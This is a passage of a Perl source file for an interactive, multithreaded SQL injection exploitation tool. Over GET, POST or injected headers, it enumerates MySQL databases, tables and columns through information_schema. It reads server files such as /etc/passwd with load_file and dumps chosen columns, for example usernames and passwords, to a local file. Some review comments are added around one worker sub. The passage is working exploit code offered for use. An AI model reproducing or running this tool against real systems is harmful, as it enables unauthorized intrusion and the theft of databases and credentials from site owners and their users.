  568.      open( FILE, ">>" . "z_" .$host . ".txt" ); # ???? ??? ?????? ???????????
  569.      ## ???-?? ?? ? information_schema.schemata ##
  570.      $url11 = $sql_start . $sql_pref1 . "count(schema_name)" . $sql_pref2 . $sql_end . $plus . "from" . $plus . "information_schema.schemata" . $limit . $filtr; # ??????? ???-?? ??
  571.      if($sql_flag == 0){
  572.          $current = $url11;
  573.          $content = scan_url();
  574.      } elsif ($sql_flag == 1) {#POST
  575.          $current = $source_sql;
  576.          $sql_post = $url11;
  577.          $content = scan_url_POST();
  578.      } elsif($sql_flag == 2){#HEADER
  579.          $current = $source_sql;
  580.          $sql_header_query = $url11;
  581.          $sql_header_query =~ s!\Q$search!$replacement!g;
  582.          $content = scan_url_HEADER();
  583.      }
  584.      $bd_num = $content;
  585.      $bd_num =~ m/ussr(.*?)ussr/img;
  586.      $bd_num = $1;
  587.      print FILE "-----------------------------------------\n";
  588.      print FILE "Data bases in information_schema.schemata: $bd_num\n";
  589.      print FILE "-----------------------------------------\n";
  590.      print "-----------------------------------------\n";
  591.      print "Data bases in information_schema.schemata - $1\n";
  592.      print "-----------------------------------------\n";
  593.      $url12 = $sql_start . $sql_CP_start . $sql_pref1 . "schema_name" . $sql_pref2 . $sql_CP_end . $sql_end . $plus . "from" . $plus . "information_schema.schemata";
  594.      $num = -1; # ?? ????????
  595.      $thr = $kol_threads; # ???-?? ???????
  596.      print "Request method - $method\n";
  597.      print "Threads - $kol_threads\n";
  598.      print "Proxy - $proxy_message\n";
  599.      print "----------------------\n";
  600.       for(0..$thr) {
  601.          $trl[$_] = threads->create(\&gets5050);
  602.      }
  603.      for(0..$thr) {
  604.          $trl[$_]->join;
  605.      }
  606.      sub gets5050 {
  607.        $| = 1;
  608.        while ($num<=$bd_num) {
  609.          { lock($num);
  610.          $num++; }
  611.          if($sql_flag == 0){
  612.               $current = $url12 . $plus . "limit" . $plus . $num . ",1" . $filtr;
  613.               $content = scan_url();
  614.             } elsif ($sql_flag == 1) {#POST
  615.               $current = $source_sql;
  616.               $sql_post = $url12 . $plus . "limit" . $plus . $num . ",1" . $filtr;
  617.               $content = scan_url_POST();
  618.             } elsif($sql_flag == 2){#HEADER
  619.               $current = $source_sql;
  620.               $sql_header_query = $url12 . $plus . "limit" . $plus . $num . ",1" . $filtr;
  621.               $sql_header_query =~ s!\Q$search!$replacement!g;
  622.               $content = scan_url_HEADER();
  623.            }
  624.          if ($content =~ m/ussr(.*?)ussr/img) {
  625.                   print $1 . "\n";
  626.                   print FILE $1 . "\n";
  627.          }
  628.          print $num . "\r";
  629.          sleep $pause;
  630.  
  631.        }
  632.      }
  633.     print "----------\n";
  634.     print "Saved in " . "z_" . $host . ".txt\n";
  635.     close(FILE);
  636.     goto START;
  637. }
  638. if ($choice == 3) {
  639.      open( FILE, ">>" . "z_" .$host . ".txt" ); # ???? ??? ?????? ???????????
  640.      print "-----------------------------------------\n";
  641.      print "Enter the DB-name: ";
  642.      $choice = <STDIN>;
  643.      chomp $choice;
  644.      if ($choice =~ m/-/imgs) {$choice = "`" . $choice . "`"}
  645.      print "DB-name: $choice\n";
  646.      print "----------\n";
  647.      $choice1 = ascii_to_hex $choice;
  648.      ## ???-?? tables ? information_schema.schemata ##
  649.      $url11 = $sql_start . $sql_pref1 . "count(table_name)" . $sql_pref2 . $sql_end . $plus . "from" . $plus . "information_schema.tables" . $plus . "where" . $plus . "table_schema=" . $plus . $choice1 . $limit . $filtr;
  650.      if($sql_flag == 0){
  651.          $current = $url11;
  652.          $content = scan_url();
  653.      } elsif ($sql_flag == 1) {#POST
  654.          $current = $source_sql;
  655.          $sql_post = $url11;
  656.          $content = scan_url_POST();
  657.      } elsif($sql_flag == 2){#HEADER
  658.               $current = $source_sql;
  659.               $sql_header_query = $url11;
  660.               $sql_header_query =~ s!\Q$search!$replacement!g;
  661.               $content = scan_url_HEADER();
  662.      }
  663.      $current = $url11;
  664.      $tab_num1 = $content;
  665.      $tab_num1 =~ m/ussr(.*?)ussr/img;
  666.      $tab_num1 = $1;
  667.      print FILE "-----------------------------------------\n";
  668.      print FILE "Tables in DB [$choice]: $tab_num1\n";
  669.      print FILE "-----------------------------------------\n";
  670.      print "-----------------------------------------\n";
  671.      print "Tables in DB [$choice]: $tab_num1\n";
  672.      print "-----------------------------------------\n";
  673.      $url12 = $sql_start . $sql_CP_start . $sql_pref1 . "table_name" . $sql_pref2 . $sql_CP_end . $sql_end . $plus . "from" . $plus . "information_schema.tables" . $plus . "where" . $plus . "table_schema=" . $plus . $choice1 ;
  674.      $num = -1; # ?? ????????
  675.      $thr = $kol_threads; # ???-?? ???????
  676.      print "Request method - $method\n";
  677.      print "Threads - $kol_threads\n";
  678.      print "Proxy - $proxy_message\n";
  679.      print "----------------------\n";
  680.       for(0..$thr) {
  681.          $trl[$_] = threads->create(\&gets5051);
  682.      }
  683.      for(0..$thr) {
  684.          $trl[$_]->join;
  685.      }
  686.      sub gets5051 {
  687.        $| = 1;
  688.        while ($num<$tab_num1) {
  689.          { lock($num);
  690.          $num++; }
  691.          if($sql_flag == 0){
  692.             $current = $url12 . $plus . "limit" . $plus . $num . ",1" . $filtr;
  693.             $content = scan_url();
  694.          } elsif ($sql_flag == 1) {#POST
  695.             $current = $source_sql;
  696.             $sql_post = $url12 . $plus . "limit" . $plus . $num . ",1" . $filtr;
  697.             $content = scan_url_POST();
  698.          } elsif($sql_flag == 2){#HEADER
  699.               $current = $source_sql;
  700.               $sql_header_query = $url12 . $plus . "limit" . $plus . $num . ",1" . $filtr;
  701.               $sql_header_query =~ s!\Q$search!$replacement!g;
  702.               $content = scan_url_HEADER();
  703.          }
  704.          if ($content =~ m/ussr(.*?)ussr/img) {
  705.                   print $1 . "\n";
  706.                   print FILE $1 . "\n";
  707.          }
  708.          print $num . "\r";
  709.          sleep $pause;
  710.  
  711.        }
  712.      }
  713.     print "----------\n";
  714.     print "Saved in " . "z_" . $host . ".txt\n";
  715.     close(FILE);
  716.     goto START;
  717. }
  718. if ($choice == 13) {
  719.      M_LOAD_FILE:
  720.      open( FILE1, ">>" . "z_" .$host . ".txt" ); # ???? ??? ?????? ???????????
  721.      print "-----------------------------------------\n";
  722.      print "Enter file name (example: /etc/passwd) or type <exit> for main menu: ";
  723.      $choice = <STDIN>;
  724.      chomp $choice;
  725.      if ($choice eq "exit") {close(FILE);goto START;}
  726.      print "File name for read: $choice\n";
  727.      $choice1 = ascii_to_hex $choice;
  728.      if($sql_flag == 0){
  729.          $current = $sql_start . $sql_CP_start . $sql_pref1 . "concat(0x6d7973716c2e757365723a,load_file($choice1))" . $sql_pref2 . $sql_CP_end . $sql_end . $limit . $filtr;
  730.          $content = scan_url();
  731.      } elsif ($sql_flag == 1) {#POST
  732.          $current = $source_sql;
  733.          $sql_post = $sql_start . $sql_CP_start . $sql_pref1 . "concat(0x6d7973716c2e757365723a,load_file($choice1))" . $sql_pref2 . $sql_CP_end . $sql_end . $limit . $filtr;
  734.          $content = scan_url_POST();
  735.      } elsif($sql_flag == 2){#HEADER
  736.               $current = $source_sql;
  737.               $sql_header_query = $sql_start . $sql_CP_start . $sql_pref1 . "concat(0x6d7973716c2e757365723a,load_file($choice1))" . $sql_pref2 . $sql_CP_end . $sql_end . $limit . $filtr;
  738.               $sql_header_query =~ s!\Q$search!$replacement!g;
  739.               $content = scan_url_HEADER();
  740.      }
  741.      if ($content =~ m/ussr(.*?)ussr/imgs) {
  742.             print "\n\n\n" . $1 . "\n";
  743.             print FILE $1 . "\n";
  744.      }
  745.      print "----------\n";
  746.      print "Saved in " . "z_" . $host . ".txt\n";
  747.      close(FILE);
  748.      goto M_LOAD_FILE;
  749. }
  750. if ($choice == 4) {
  751.      open( FILE, ">>" . "z_" .$host . ".txt" ); # ???? ??? ?????? ???????????
  752.      print "-----------------------------------------\n";
  753.      print "Enter the DB-name: ";
  754.      $choice = <STDIN>;
  755.      chomp $choice;
  756.      if ($choice =~ m/-/imgs) {$choice = "`" . $choice . "`"}
  757.      print "DB-name: $choice\n";
  758.      print "----------\n";
  759.      $choice1 = ascii_to_hex $choice;
  760.      print "-----------------------------------------\n";
  761.      print "Enter the TABLE-name: ";
  762.      $choice2 = <STDIN>;
  763.      chomp $choice2;
  764.      if ($choice2 =~ m/-/imgs) {$choice2 = "`" . $choice2 . "`"}
  765.      print "TABLE-name: $choice2\n";
  766.      print "----------\n";
  767.      $choice3 = ascii_to_hex $choice2;
  768.      $url11 = $sql_start . $sql_pref1 . "count(column_name)" . $sql_pref2 . $sql_end . $plus . "from" . $plus . "information_schema.columns" . $plus . "where" . $plus . "table_name=" . $choice3 . $plus . "and" . $plus . "table_schema=" . $plus . $choice1 . $limit . $filtr;
  769.     if($sql_flag == 0){
  770.          $current = $url11;
  771.          $content = scan_url();
  772.      } elsif ($sql_flag == 1) {#POST
  773.          $current = $source_sql;
  774.          $sql_post = $url11;
  775.          $content = scan_url_POST();
  776.      } elsif($sql_flag == 2){#HEADER
  777.               $current = $source_sql;
  778.               $sql_header_query = $url11;
  779.               $sql_header_query =~ s!\Q$search!$replacement!g;
  780.               $content = scan_url_HEADER();
  781.      }
  782.      $col_num1 = $content;
  783.      $col_num1 =~ m/ussr(.*?)ussr/img;
  784.      $col_num1 = $1;
  785.      print FILE "-----------------------------------------\n";
  786.      print FILE "Columns in [$choice.$choice2]: $col_num1\n";
  787.      print FILE "-----------------------------------------\n";
  788.      print "-----------------------------------------\n";
  789.      print "Columns in [$choice.$choice2]: $col_num1\n";
  790.      print "-----------------------------------------\n";
  791.      $url12 = $sql_start . $sql_CP_start . $sql_pref1 . "column_name" . $sql_pref2 . $sql_CP_end . $sql_end . $plus . "from" . $plus . "information_schema.columns" . $plus . "where" . $plus . "table_name=" . $choice3 . $plus . "and" . $plus . "table_schema=" . $plus . $choice1;
  792.      $num = -1; # ?? ????????
  793.      $thr = $kol_threads; # ???-?? ???????
  794.      print "Request method - $method\n";
  795.      print "Threads - $kol_threads\n";
  796.      print "Proxy - $proxy_message\n";
  797.      print "----------------------\n";
  798.       for(0..$thr) {
  799.          $trl[$_] = threads->create(\&gets5052);
  800.      }
  801.      for(0..$thr) {
  802.          $trl[$_]->join;
  803.      }
  804.      sub gets5052 {
  805.        $| = 1;
  806.        while ($num<$col_num1) {
  807.          { lock($num);
  808.          $num++; }
  809.          if($sql_flag == 0){
  810.            $current = $url12 . $plus . "limit" . $plus . $num . ",1" . $filtr;
  811.            $content = scan_url();
  812.          } elsif ($sql_flag == 1) {#POST
  813.            $current = $source_sql;
  814.            $sql_post = $url12 . $plus . "limit" . $plus . $num . ",1" . $filtr;
  815.            $content = scan_url_POST();
  816.          } elsif($sql_flag == 2){#HEADER
  817.               $current = $source_sql;
  818.               $sql_header_query = $url12 . $plus . "limit" . $plus . $num . ",1" . $filtr;
  819.               $sql_header_query =~ s!\Q$search!$replacement!g;
  820.               $content = scan_url_HEADER();
  821.          }
  822.          if ($content =~ m/ussr(.*?)ussr/img) {
  823.                   print $1 . "\n";
  824.                   print FILE $1 . "\n";
  825.          }
  826.          print $num . "\r";
  827.          sleep $pause;
  828.  
  829.        }
  830.      }
  831.     print "----------\n";
  832.     print "Saved in " . "z_" . $host . ".txt\n";
  833.     close(FILE);
  834.     goto START;
  835. }
  836. #################################################################################
  837. if ($choice == 5) {
  838.      open( FILE, ">>" . "z_" .$host . ".txt" ); # ???? ??? ?????? ???????????
  839.      ## ???-?? ?????? ? information_schema.tables ##
  840.      $url11 = $sql_start . $sql_pref1 . "count(table_name)" . $sql_pref2 . $sql_end . $plus . "from" . $plus . "information_schema.tables" . $limit . $filtr; # ??????? ???-?? ??????
  841.      if($sql_flag == 0){
  842.          $current = $url11;
  843.          $content = scan_url();
  844.      } elsif ($sql_flag == 1) {#POST
  845.          $current = $source_sql;
  846.          $sql_post = $url11;
  847.          $content = scan_url_POST();
  848.      } elsif($sql_flag == 2){#HEADER
  849.               $current = $source_sql;
  850.               $sql_header_query = $url11;
  851.               $sql_header_query =~ s!\Q$search!$replacement!g;
  852.               $content = scan_url_HEADER();
  853.      }  
  854.      $tab_num = $content;
  855.      $tab_num =~ m/ussr(.*?)ussr/imgs;
  856.      $tab_num = $1; # ???-?? ???????? ? informaion_schema
  857.      print "-----------------------------------------\n";
  858.      print "Tables in information_schema.tables - $1\n";
  859.      print "-----------------------------------------\n";
  860.      ## start from2 ##
  861.      print "Get ALL tables from information_schema ($1) ? (1/0): ";
  862.      $choice = <STDIN>;
  863.      chomp $choice;
  864.      $thr = $kol_threads; # ???-?? ???????
  865.      if ($choice == 1) {
  866.           $num = -1; # ?? ????????
  867.      } else {
  868.           print "Enter START_position: ";
  869.           $choice1 = <STDIN>;
  870.           chomp $choice1;
  871.           $num = $choice1-2;
  872.           print "Enter END_position: ";
  873.           $choice2 = <STDIN>;
  874.           chomp $choice2;
  875.           $tab_num = $choice2-1;
  876.           print "Dump records from [" . ($num+2) . "] to [" . ($tab_num+1) . "]\n";
  877.      }
  878.      print "-----------------------------------------\n";
  879.      ## end from2
  880.      print FILE  "-----------------------------------------\n";
  881.      print FILE  "Tables in information_schema.tables - $1\n";
  882.      print FILE  "-----------------------------------------\n";
  883.      $url12 = $sql_start . $sql_CP_start . $sql_pref1 . "table_name" . $sql_pref2 . $sql_CP_end . $sql_end . $plus . "from" . $plus . "information_schema.tables";
  884.      print "Request method - $method\n";
  885.      print "Threads - $kol_threads\n";
  886.      print "Proxy - $proxy_message\n";
  887.      print "----------------------\n";
  888.      for(0..$thr) {
  889.          $trl[$_] = threads->create(\&gets);
  890.      }
  891.      for(0..$thr) {
  892.          $trl[$_]->join;
  893.      }
  894.      sub gets {
  895.        $| = 1;
  896.        while ($num<$tab_num) {
  897.          { lock($num);
  898.          $num++; }
  899.          if($sql_flag == 0){
  900.            $current = $url12 . $plus . "limit" . $plus . $num . ",1" . $filtr;
  901.            $content = scan_url();
  902.          } elsif ($sql_flag == 1) {#POST
  903.            $current = $source_sql;
  904.            $sql_post = $url12 . $plus . "limit" . $plus . $num . ",1" . $filtr;
  905.            $content = scan_url_POST();
  906.         } elsif($sql_flag == 2){#HEADER
  907.               $current = $source_sql;
  908.               $sql_header_query = $url12 . $plus . "limit" . $plus . $num . ",1" . $filtr;
  909.               $sql_header_query =~ s!\Q$search!$replacement!g;
  910.               $content = scan_url_HEADER();
  911.         }  
  912.          if ($content =~ m/ussr(.*?)ussr/img) {
  913.                   print $1 . "\n";
  914.                   print FILE $1 . "\n";
  915.          }
  916.          print $num . "\r";
  917.          sleep $pause;
  918.  
  919.        }
  920.      }
  921.     print "----------\n";
  922.     print "Saved in " . "z_" . $host . ".txt\n";
  923.     close(FILE);
  924.     goto START;
  925. }
  926. if ($choice == 6) {
  927.     open( FILE, ">>" . "z_" .$host . ".txt" ); # ???? ??? ?????? ???????????
  928.     print "-----------------------------------------\n";
  929.     print "Enter the table_name: ";
  930.     $choice = <STDIN>;
  931.     chomp $choice;
  932.     if ($choice =~ m/-/imgs) {$choice = "`" . $choice . "`"}
  933.     print "Table: $choice\n";
  934.     print "----------\n";
  935.     print FILE  "-----------------------------------------\n";
  936.     print FILE  "Table [ $choice ]\n";
  937.     print FILE  "-----------------------------------------\n";
  938.     $choice1 = ascii_to_hex $choice;
  939.     $url13 = $sql_start . $sql_CP_start . $sql_pref1 . "table_schema" . $sql_pref2 . $sql_CP_end . $sql_end . $plus . "from" . $plus . "information_schema.tables" . $plus . "where" . $plus . "table_name=" . $choice1 . $limit . $filtr;
  940.     if($sql_flag == 0){
  941.          $current = $url13;
  942.          $content = scan_url();
  943.      } elsif ($sql_flag == 1) {#POST
  944.          $current = $source_sql;
  945.          $sql_post = $url13;
  946.          $content = scan_url_POST();
  947.     } elsif($sql_flag == 2){#HEADER
  948.               $current = $source_sql;
  949.               $sql_header_query = $url13;
  950.               $sql_header_query =~ s!\Q$search!$replacement!g;
  951.               $content = scan_url_HEADER();
  952.     }  
  953.     $prefix = $content;
  954.     $prefix =~ m/ussr(.*?)ussr/img;
  955.     $prefix = $1; # ??, ? ??????? ???????
  956.     if ($prefix =~ m/-/imgs) {$prefix = "`" . $prefix . "`"}
  957.     print "Database for $choice: $prefix\n";
  958.     print FILE  "Database for $choice: $prefix\n";
  959.     $url14 = $sql_start . $sql_pref1 . "count(*)" . $sql_pref2 . $sql_end . $plus . "from" . $plus . "information_schema.columns" . $plus . "where" . $plus . "table_name=" . $choice1 . $limit . $filtr;
  960.     if($sql_flag == 0){
  961.          $current = $url14;
  962.          $content = scan_url();
  963.      } elsif ($sql_flag == 1) {#POST
  964.          $current = $source_sql;
  965.          $sql_post = $url14;
  966.          $content = scan_url_POST();
  967.      } elsif($sql_flag == 2){#HEADER
  968.               $current = $source_sql;
  969.               $sql_header_query = $url14;
  970.               $sql_header_query =~ s!\Q$search!$replacement!g;
  971.               $content = scan_url_HEADER();
  972.     }  
  973.     $colum_number = $content;
  974.     $colum_number =~ m/ussr(.*?)ussr/img;
  975.     $colum_number = $1; # ???-?? ??????? ? ??????????? ?????
  976.     $full_table_name = $prefix . "." . $choice;
  977.     print "Number of columns in " . $full_table_name . ": $colum_number\n";
  978.     print FILE  "Number of columns in " . $full_table_name . ": $colum_number\n";
  979.     print "----------\n";
  980.     ## ?????? ??????? ##
  981.     $thr = $kol_threads; # ???-?? ???????
  982.     $num = -1; # ?? ????????
  983.     print "Request method - $method\n";
  984.     print "Threads - $kol_threads\n";
  985.     print "Proxy - $proxy_message\n";
  986.     print "----------------------\n";
  987.     $url15 = $sql_start . $sql_CP_start . $sql_pref1 . "column_name" . $sql_pref2 . $sql_CP_end . $sql_end . $plus . "from" . $plus . "information_schema.columns" . $plus . "where" . $plus . "table_name=" . $choice1;
  988.     print FILE  "Columns in " . $full_table_name . "\n";
  989.     for(0..$thr) {
  990.          $trl[$_] = threads->create(\&gets2);
  991.     }
  992.     for(0..$thr) {
  993.          $trl[$_]->join;
  994.     }
  995.     sub gets2 {
  996.        $| = 1;
  997.        while ($num<$colum_number) {
  998.          { lock($num);
  999.          $num++; }
  1000.          if($sql_flag == 0){
  1001.             $current = $url15 . $plus . "limit" . $plus . $num . ",1" . $filtr;
  1002.             $content = scan_url();
  1003.          } elsif ($sql_flag == 1) {#POST
  1004.             $current = $source_sql;
  1005.             $sql_post = $url15 . $plus . "limit" . $plus . $num . ",1" . $filtr;
  1006.             $content = scan_url_POST();
  1007.         } elsif($sql_flag == 2){#HEADER
  1008.               $current = $source_sql;
  1009.               $sql_header_query = $url15 . $plus . "limit" . $plus . $num . ",1" . $filtr;
  1010.               $sql_header_query =~ s!\Q$search!$replacement!g;
  1011.               $content = scan_url_HEADER();
  1012.         }  
  1013.          if ($content =~ m/ussr(.*?)ussr/img) {
  1014.                   print "   " . $1 . "\n";
  1015.                   print FILE "  "  . $1 . "\n";
  1016.          }
  1017.          print $num . "\r";
  1018.          sleep $pause;
  1019.  
  1020.        }
  1021.     }
  1022.     print FILE "----------\n";
  1023.     print "----------\n";
  1024.     print "Saved in " . "z_" . $host . ".txt\n";
  1025.     close(FILE);
  1026.     goto START;
  1027. }
  1028. if ($choice == 7) {
  1029.     sub ascii_to_hex ($) {
  1030.              (my $str = shift) =~ s/(.|\n)/sprintf("%02lx", ord $1)/eg;
  1031.              $str = "0x" . $str;
  1032.              return $str;
  1033.     }
  1034.     open( FILE, ">>" . "z_" .$host . ".txt" ); # ???? ??? ?????? ???????????
  1035.     if ($full_table_name) {
  1036.        print "-----------------------------------------\n";
  1037.        print "Use last parsed table: $full_table_name ? (1/0): ";
  1038.        $choice = <STDIN>;
  1039.        chomp $choice;
  1040.        if ($choice==1) {
  1041.              $table_name = $full_table_name;
  1042.              print "Table: $table_name\n";
  1043.              print "----------\n";
  1044.        } else {
  1045.              print "-----------------------------------------\n";
  1046.              print "Enter the table_name: ";
  1047.              $choice = <STDIN>;
  1048.              chomp $choice;
  1049.              if ($prefix =~ m/-/imgs) {$prefix = "`" . $prefix . "`"}
  1050.              $table_name = $choice;
  1051.              if ($table_name =~ m/-/imgs) {$table_name = "`" . $table_name . "`"}
  1052.              print "-----------------------------------------\n";
  1053.              print "MySQL>=5 or MySql<5? (1/0): ";
  1054.              $choice = <STDIN>;
  1055.              chomp $choice;
  1056.              if ($choice == 1) {
  1057.                   $choice1 = ascii_to_hex $table_name;
  1058.                   $url13 = $sql_start . $sql_CP_start . $sql_pref1 . "table_schema" . $sql_pref2 . $sql_CP_end . $sql_end . $plus . "from" . $plus . "information_schema.columns" . $plus . "where" . $plus . "table_name=" . $choice1 . $limit . $filtr;
  1059.                   if($sql_flag == 0){
  1060.                     $current = $url13;
  1061.                     $content = scan_url();
  1062.                   } elsif ($sql_flag == 1) {#POST
  1063.                     $current = $source_sql;
  1064.                     $sql_post = $url13;
  1065.                     $content = scan_url_POST();
  1066.                   } elsif($sql_flag == 2){#HEADER
  1067.                     $current = $source_sql;
  1068.                     $sql_header_query = $url13;
  1069.                     $sql_header_query =~ s!\Q$search!$replacement!g;
  1070.                     $content = scan_url_HEADER();
  1071.                   }  
  1072.                   $prefix = $content;
  1073.                   $prefix =~ m/ussr(.*?)ussr/img;
  1074.                   $prefix = $1; # ??, ? ??????? ???????
  1075.                   if ($prefix =~ m/-/imgs) {$prefix = "`" . $prefix . "`"}
  1076.                   $table_name = "`" . $prefix . "." . $table_name . "`";
  1077.              }
  1078.              print "Table: $table_name\n";
  1079.              print "----------\n";
  1080.        }
  1081.     } else {
  1082.        print "-----------------------------------------\n";
  1083.        print "Enter the table_name: ";
  1084.        $choice = <STDIN>;
  1085.        chomp $choice;
  1086.        $table_name = $choice;
  1087.        if ($table_name =~ m/-/imgs) {$table_name = "`" . $table_name . "`"}
  1088.        print "-----------------------------------------\n";
  1089.        print "MySQL>=5 or MySql<5? [if DBname.TableName - 0] (1/0): ";
  1090.        $choice = <STDIN>;
  1091.        chomp $choice;
  1092.        if ($choice == 1) {
  1093.                   $choice1 = ascii_to_hex $table_name;
  1094.                   $url13 = $sql_start . $sql_CP_start . $sql_pref1 . "table_schema" . $sql_pref2 . $sql_CP_end . $sql_end . $plus . "from" . $plus . "information_schema.columns" . $plus . "where" . $plus . "table_name=" . $choice1 . $limit . $filtr;
  1095.                    if($sql_flag == 0){
  1096.                     $current = $url13;
  1097.                     $content = scan_url();
  1098.                   } elsif ($sql_flag == 1) {#POST
  1099.                     $current = $source_sql;
  1100.                     $sql_post = $url13;
  1101.                     $content = scan_url_POST();
  1102.                   } elsif($sql_flag == 2){#HEADER
  1103.                     $current = $source_sql;
  1104.                     $sql_header_query = $url13;
  1105.                     $sql_header_query =~ s!\Q$search!$replacement!g;
  1106.                     $content = scan_url_HEADER();
  1107.                   }  
  1108.                   $prefix = $content;
  1109.                   $prefix =~ m/ussr(.*?)ussr/img;
  1110.                   $prefix = $1; # ??, ? ??????? ???????
  1111.                   if ($prefix =~ m/-/imgs) {$prefix = "`" . $prefix . "`"}
  1112.                   $table_name = $prefix . "." . $table_name;
  1113.        }
  1114.        print "Table: $table_name\n";
  1115.        print "----------\n";
  1116.     }
  1117.     print "-----------------------------------------\n";
  1118.     print "Enter the column(s) name(s) - for example - id or id,username,user_password:\n";
  1119.     $choice = <STDIN>;
  1120.     chomp $choice;
  1121.     $column_name = $choice;
  1122.     print FILE  "-----------------------------------------\n";
  1123.     print FILE  "Dump column(s): [ " . $column_name . " ] from [ " .$table_name . " ]\n";
  1124.     print FILE  "-----------------------------------------\n";
  1125.     print "Dump column(s): [ " . $column_name . " ] from [ " .$table_name . " ]\n";
  1126.     print "-----------------------------------------\n";
  1127.     print "Do you want add condition to sql-query?\n";
  1128.     print "----------\n";
  1129.     print "for example - where id=1, where username=admin (no quotes)  ? (1/0): ";
  1130.     $choice = <STDIN>;
  1131.     chomp $choice;
  1132.     if ($choice==1) {
  1133.         print "-----------------------------------------\n";
  1134.         print "Enter your condition here - only one condition, without 'where', '+' and quotes, example - id=1 :\n";
  1135.         print "----------\n";
  1136.         $choice = <STDIN>;
  1137.         chomp $choice;
  1138.  
  1139.         $where = $choice;
  1140.         # ?????????:
  1141.         ($con,$whe) = split(/=/,$where);
  1142.         if($whe =~ m/[^0-9]/img) {$where = $con . "=" . ascii_to_hex $whe}
  1143.         print "Your condition: [ where $where ]\n";
  1144.         $condition=1;
  1145.     } else {
  1146.         $condition=0;
  1147.     }
  1148.     if ($condition==0) {
  1149.          print "----------\n";
  1150.          ## ?????? ???-?? ???????? ?? ??????? #
  1151.          print "Count data from [ $table_name  ]\n";
  1152.          $url16 = $sql_start . $sql_pref1 . "count(*)" . $sql_pref2 . $sql_end . $plus . "from" . $plus . $table_name . $limit . $filtr;
  1153.          if($sql_flag == 0){
  1154.               $current = $url16;
  1155.               $content = scan_url();
  1156.          } elsif ($sql_flag == 1) {#POST
  1157.               $current = $source_sql;
  1158.               $sql_post = $url16;
  1159.               $content = scan_url_POST();
  1160.          } elsif($sql_flag == 2){#HEADER
  1161.                     $current = $source_sql;
  1162.                     $sql_header_query = $url16;
  1163.                     $sql_header_query =~ s!\Q$search!$replacement!g;
  1164.                     $content = scan_url_HEADER();
  1165.          }  
  1166.          $column_name_p = $content;
  1167.          $column_name_p =~ m/ussr(.*?)ussr/img;
  1168.          $column_name_p = $1; # ???-?? ???????? ? ??????? ?? ????????? ???????
  1169.          print "$column_name_p\n";
  1170.          print "----------\n";
  1171.          ## start from2 ##
  1172.          print "Get ALL data from " . $table_name . " (" . $column_name_p . ") ? (1/0): ";
  1173.          $choice = <STDIN>;
  1174.          chomp $choice;
  1175.          $thr = $kol_threads; # ???-?? ???????
  1176.          if ($choice == 1) {
  1177.               $num = -1; # ?? ????????
  1178.          } else {
  1179.               print "Enter START_position: ";
  1180.               $choice1 = <STDIN>;
  1181.               chomp $choice1;
  1182.               $num = $choice1-2;
  1183.               print "Enter END_position: ";
  1184.               $choice2 = <STDIN>;
  1185.               chomp $choice2;
  1186.               $column_name_p = $choice2-1;
  1187.               print "Dump records from [" . ($num+2) . "] to [" . ($column_name_p+1) . "]\n";
  1188.          }
  1189.          print "-----------------------------------------\n";
  1190.          print "Request method - $method\n";
  1191.          print "Threads - $kol_threads\n";
  1192.          print "Proxy - $proxy_message\n";
  1193.          print "----------------------\n";
  1194.          ## end from2
  1195.          ## fetch the rows from the table ##
  1196.          $url17 = $sql_start . $sql_CP_start . $sql_pref1 . "concat_ws(0x3a," . $column_name . ")" . $sql_pref2 . $sql_CP_end . $sql_end . $plus ."from" . $plus . $table_name;
  1197.          for(0..$thr) {
  1198.              $trl[$_] = threads->create(\&gets4);
  1199.          }
  1200.          for(0..$thr) {
  1201.              $trl[$_]->join;
  1202.          }
         # Worker for the row dump of mode 7 without a WHERE clause. One copy
         # runs in each thread created by the loop above. Only $num is
         # `: shared` (declared at the top of the file); the other globals this
         # sub writes ($current, $content, $sql_post, $sql_header_query) are
         # per-thread copies under Perl's threads model, so the workers do not
         # clobber each other's request state.
         # Reads: $num (next row index), $column_name_p (last row index, fixed
         # before the threads start), $url17 (query built above), $sql_flag,
         # $source_sql, $plus, $filtr, $search, $replacement, $pause.
         # Writes: one line per recovered row to STDOUT and to the FILE handle
         # opened earlier in this mode.
         # NOTE(review): $num is incremented under the lock but read again
         # outside it on every request line below, so two workers can fetch the
         # same index and skip another; copy it into a lexical inside the
         # locked block. Several workers can also pass the `while` test before
         # any of them increments, so a few indexes past $column_name_p are
         # requested (they simply return no row).
         # NOTE(review): FILE is written from every thread without a lock, so
         # output lines can interleave.
         # This is a named sub nested in an `if` block: Perl compiles it once
         # at file scope, the nesting is only visual.
         sub gets4 {
            $| = 1;   # unbuffered STDOUT so the "\r" progress line updates
            while ($num<$column_name_p) {
               { lock($num);
               $num++; }
               if($sql_flag == 0){   # 0: the query travels in the URL
                  $current = $url17 . $plus . "limit" . $plus . $num . ",1" . $filtr;
                  $content = scan_url();
               } elsif ($sql_flag == 1) {#POST: the query travels in $sql_post
                  $current = $source_sql;
                  $sql_post = $url17 . $plus . "limit" . $plus . $num . ",1" . $filtr;
                  $content = scan_url_POST();
               } elsif($sql_flag == 2){#HEADER: every \Q$search\E in the query is rewritten to $replacement first (both set elsewhere)
                    $current = $source_sql;
                    $sql_header_query = $url17 . $plus . "limit" . $plus . $num . ",1" . $filtr;
                    $sql_header_query =~ s!\Q$search!$replacement!g;
                    $content = scan_url_HEADER();
               }  
               # A row counts as recovered only when the response carries the
               # fixed "ussr" marker on both sides of the value (presumably
               # emitted by $sql_CP_start/$sql_CP_end, defined elsewhere).
               # Because that literal is constant across every request, it is
               # also what server-side logging and WAF/IDS rules can match on.
               if ($content =~ m/ussr(.*?)ussr/img) {
                    print "   " . $1 . "\n";
                    print FILE "  "  . $1 . "\n";
               }
               print $num . "\r";
               sleep $pause;   # $pause is set outside this chunk — presumably the per-request delay; confirm
 
            }
         }
  1230.     print "----------\n";
  1231.     print "Saved in " . "z_" . $host . ".txt\n";
  1232.     close(FILE);
  1233.     goto START;
  1234.     } else {
  1235.     ## fetch the rows from the table, filtered by the WHERE condition ##
  1236.          print "Count data from [ $table_name  ] with [ where " . $where . " ] \n";
  1237.          $url16 = $sql_start . $sql_pref1 . "count(*)" . $sql_pref2 . $sql_end . $plus . "from" . $plus . $table_name . $plus . "where" . $plus . $where . $limit . $filtr;
  1238.          if($sql_flag == 0){
  1239.                $current = $url16;
  1240.                $content = scan_url();
  1241.          } elsif ($sql_flag == 1) {#POST
  1242.                $current = $source_sql;
  1243.                $sql_post = $url16;
  1244.                $content = scan_url_POST();
  1245.          } elsif($sql_flag == 2){#HEADER
  1246.                     $current = $source_sql;
  1247.                     $sql_header_query = $url16;
  1248.                     $sql_header_query =~ s!\Q$search!$replacement!g;
  1249.                     $content = scan_url_HEADER();
